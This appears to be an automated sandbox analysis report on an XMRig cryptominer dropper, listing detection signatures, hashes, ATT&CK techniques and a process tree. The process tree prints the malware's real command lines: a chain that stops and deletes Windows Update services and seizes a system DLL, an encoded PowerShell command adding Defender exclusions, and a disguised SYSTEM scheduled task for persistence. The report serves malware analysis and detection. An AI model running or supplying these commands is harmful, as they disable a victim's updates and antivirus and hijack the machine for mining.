Analysis

  • max time kernel
    300s
  • max time network
    275s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    29-06-2022 22:15

General

  • Target

    1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe

  • Size

    7.4MB

  • MD5

    d039361e9ca80d93126dce4151806527

  • SHA1

    b2ee80df3eaa3111e6ee00608307c6ed6f9a6632

  • SHA256

    1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca

  • SHA512

    da114fcb97f881a056e18294954390b8d532444a4b68876611799ecd64eac13b8aaec03a2d8d4cc3742a9f662fd948526d8cbc07534f3468e31fcdc83bceab5a

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe
    "C:\Users\Admin\AppData\Local\Temp\1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
          PID:1616
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2724
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4236
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4748
            • C:\Windows\system32\sc.exe
              sc stop UsoSvc
              5⤵
              • Launches sc.exe
              PID:4816
            • C:\Windows\system32\sc.exe
              sc stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              PID:4828
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              5⤵
              • Launches sc.exe
              PID:4784
            • C:\Windows\system32\sc.exe
              sc stop bits
              5⤵
              • Launches sc.exe
              PID:4500
            • C:\Windows\system32\sc.exe
              sc stop dosvc
              5⤵
              • Launches sc.exe
              PID:1252
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              5⤵
              • Modifies registry key
              PID:4940
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              5⤵
              • Modifies registry key
              PID:3972
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              5⤵
              • Modifies security service
              • Modifies registry key
              PID:4628
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              5⤵
              • Modifies registry key
              PID:4724
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              5⤵
              • Modifies registry key
              PID:1432
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:724
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1936
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:4708
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:2428
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:676
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:2388
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              5⤵
                PID:744
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                5⤵
                  PID:4276
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                  5⤵
                    PID:4308
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    5⤵
                      PID:4520
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                      5⤵
                        PID:4556
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                        5⤵
                          PID:2236
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          5⤵
                            PID:532
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4780
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4716
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2100
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4864
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4972
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3164
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:2788
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:2656
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:4240
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:4688
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Checks computer location settings
                          PID:1432
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:5104
                      • C:\Windows\system32\browser_broker.exe
                        C:\Windows\system32\browser_broker.exe -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        PID:4328
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3200
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2744
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2652
                      • C:\Program Files\Chrome\updater.exe
                        "C:\Program Files\Chrome\updater.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:2888
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4968
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
                            3⤵
                              PID:3056
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4180
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              3⤵
                                PID:5064
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:2156
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:4684
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  4⤵
                                  • Launches sc.exe
                                  PID:724
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  4⤵
                                  • Launches sc.exe
                                  PID:4452
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:1032
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3844
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:832
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4296
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4312
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4228
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4544
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1332
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:444
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4748
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4760
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4776
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  4⤵
                                    PID:3840
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    4⤵
                                      PID:2636
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      4⤵
                                        PID:4104
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        4⤵
                                          PID:4768
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          4⤵
                                            PID:4624
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            4⤵
                                              PID:4732
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              4⤵
                                                PID:4720
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              3⤵
                                                PID:2260
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3664
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2788
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1376
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1712
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe
                                                3⤵
                                                  PID:660
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "sjsmjblqiv"
                                                    4⤵
                                                      PID:1432
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe gicxwzitdcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4016
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4712
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4500

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              4
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                41fecdac1d345f98be3b3e236d8c22aa

                                                SHA1

                                                9206e0a7ed544ae9c086446d27840c390f91b869

                                                SHA256

                                                b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

                                                SHA512

                                                507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                41fecdac1d345f98be3b3e236d8c22aa

                                                SHA1

                                                9206e0a7ed544ae9c086446d27840c390f91b869

                                                SHA256

                                                b24b4a7c194ce82574729a971378351e7c65e02fdc151e8ab72d1860ed1e55d1

                                                SHA512

                                                507ac2ddb4d21e5bad7bf04819aca7e9ffa4851a4bc08ea167b461a08a6e31394919efc940e52b881fb3487e68aa9765c6f29d77aa3b7c9fc99b699fe1e2f248

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                Filesize

                                                539B

                                                MD5

